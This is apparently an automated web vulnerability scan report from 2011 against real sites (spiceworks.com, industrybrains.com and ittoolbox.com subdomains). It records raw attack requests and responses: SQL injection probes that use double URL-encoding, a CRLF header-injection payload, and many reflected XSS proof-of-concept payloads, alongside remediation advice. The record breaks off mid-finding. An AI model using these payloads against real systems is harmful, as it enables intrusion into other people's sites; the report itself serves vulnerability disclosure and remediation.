The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
Request 1
GET /features/ HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close
Response 1
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:13 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053833957570; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Google Website ...[SNIP]... <p class="testimonial">...If you're not using Spiceworks for your IT support, you're failing at IT!... —Don Mcgee, Sys Admin, Southwestern Michigan College</p> ...[SNIP]...
Request 2
GET /features/ HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close
Response 2
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:14 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053834098236; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the url request parameter is copied into the Location response header. The payload 96bfd%0d%0ad5bb6e4fc22 was submitted in the url parameter. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
Request
GET /click?sid=940&rqctid=6475&pos=1&lid=696567&cid=153413&pr=2&tstamp=20110126094929&iip=173.193.214.243<ype=JSCR&lname=560x350v1&url=96bfd%0d%0ad5bb6e4fc22 HTTP/1.1 Host: links.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object Moved Connection: close Date: Wed, 26 Jan 2011 14:56:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: CP="CAO DSP COR CURa " Location: 96bfd d5bb6e4fc22 Content-Type: text/html Set-Cookie: IBC1132967913=940@2@696567@153413@20110126095602@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:56:02 GMT;domain=IndustryBrains.com;
3. Cross-site scripting (reflected)previousnext There are 132 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://businessintelligence.ittoolbox.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://businessintelligence.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16b86'-alert(1)-'6a6fa7ccdab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?16b86'-alert(1)-'6a6fa7ccdab=1 HTTP/1.1 Host: businessintelligence.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79438 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=bjqkbtz41tqi0tz1vwqauvui; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fbusinessintelligence.ittoolbox.com%2fDefault.aspx%3f16b86'-alert(1)-'6a6fa7ccdab%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.2. http://businessintelligence.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://businessintelligence.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ae76"style%3d"x%3aexpression(alert(1))"53ed7d380a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ae76"style="x:expression(alert(1))"53ed7d380a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?6ae76"style%3d"x%3aexpression(alert(1))"53ed7d380a0=1 HTTP/1.1 Host: businessintelligence.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79550 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=yv5ih0yuwac45q45l000zbqa; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://businessintelligence.ittoolbox.com/Default.aspx?6ae76"style="x:expression(alert(1))"53ed7d380a0=1" /> ...[SNIP]...
3.3. http://c.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://c.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc95f"style%3d"x%3aexpression(alert(1))"2625c8d25b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc95f"style="x:expression(alert(1))"2625c8d25b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?fc95f"style%3d"x%3aexpression(alert(1))"2625c8d25b5=1 HTTP/1.1 Host: c.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73655 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=umajk545hmb1st451f0cu145; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> C Languages ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://c.ittoolbox.com/Default.aspx?fc95f"style="x:expression(alert(1))"2625c8d25b5=1" /> ...[SNIP]...
3.4. http://c.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://c.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14422'-alert(1)-'6b0fc08769a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?14422'-alert(1)-'6b0fc08769a=1 HTTP/1.1 Host: c.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73542 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=b0n14gf40bjjvn55mwg00vvm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> C Languages ...[SNIP]... (sender != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fc.ittoolbox.com%2fDefault.aspx%3f14422'-alert(1)-'6b0fc08769a%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.5. http://cio.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cio.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99172'-alert(1)-'cb720188f25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?99172'-alert(1)-'cb720188f25=1 HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=o3d0rzjtwft0qdf140t44su3; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:32 GMT Connection: close
3.6. http://cio.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cio.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c54c"style%3d"x%3aexpression(alert(1))"d1341797eaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c54c"style="x:expression(alert(1))"d1341797eaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?3c54c"style%3d"x%3aexpression(alert(1))"d1341797eaf=1 HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71115 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=j3l54b45qxnbq2b5b15znt45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:28 GMT Connection: close
3.7. http://cio.ittoolbox.com/events/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cio.ittoolbox.com
Path:
/events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33953'-alert(1)-'e02096512e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/?33953'-alert(1)-'e02096512e=1 HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 39061 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=4b34uq55akkdny450wll2255; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fevents%2fdefault.aspx%3f33953'-alert(1)-'e02096512e%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.8. http://cio.ittoolbox.com/groups/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cio.ittoolbox.com
Path:
/groups/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c37ce'-alert(1)-'a7fd1789ef1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /groups/?c37ce'-alert(1)-'a7fd1789ef1=1 HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 131301 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=a3abyt3ubus1p2uuqjogce45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... & sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fgroups%2fdefault.aspx%3fc37ce'-alert(1)-'a7fd1789ef1%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.9. http://cio.ittoolbox.com/research/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cio.ittoolbox.com
Path:
/research/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33008'-alert(1)-'9d7f961f948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /research/?33008'-alert(1)-'9d7f961f948=1 HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 98082 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=hkqgj0zgaipxtz45glhsdjap; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... nder != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fresearch%2fResearchSection.aspx%3f33008'-alert(1)-'9d7f961f948%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.10. http://cloud.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cloud.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 840b5"style%3d"x%3aexpression(alert(1))"4766cc8d795 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 840b5"style="x:expression(alert(1))"4766cc8d795 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?840b5"style%3d"x%3aexpression(alert(1))"4766cc8d795=1 HTTP/1.1 Host: cloud.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 56254 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=d10qzl45hht5qz23fp4nsrfn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://cloud.ittoolbox.com/Default.aspx?840b5"style="x:expression(alert(1))"4766cc8d795=1" /> ...[SNIP]...
3.11. http://cloud.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cloud.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbf1a'-alert(1)-'3dbc9db0889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cbf1a'-alert(1)-'3dbc9db0889=1 HTTP/1.1 Host: cloud.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 56139 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ywt53055nfjnwtydrpoywn55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... der != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fcloud.ittoolbox.com%2fDefault.aspx%3fcbf1a'-alert(1)-'3dbc9db0889%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.12. http://crm.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://crm.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ce50'-alert(1)-'dab597dca86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3ce50'-alert(1)-'dab597dca86=1 HTTP/1.1 Host: crm.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82857 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rof0n4454b3qd145w4ffjfy5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:54 GMT Connection: close
3.13. http://crm.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://crm.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f2fb"style%3d"x%3aexpression(alert(1))"9153b50ea5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f2fb"style="x:expression(alert(1))"9153b50ea5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?1f2fb"style%3d"x%3aexpression(alert(1))"9153b50ea5c=1 HTTP/1.1 Host: crm.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82972 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=kh14sz45wwtcvn45mjmtr5jk; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:49 GMT Connection: close
3.14. http://database.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://database.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10760'-alert(1)-'13abc61113d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
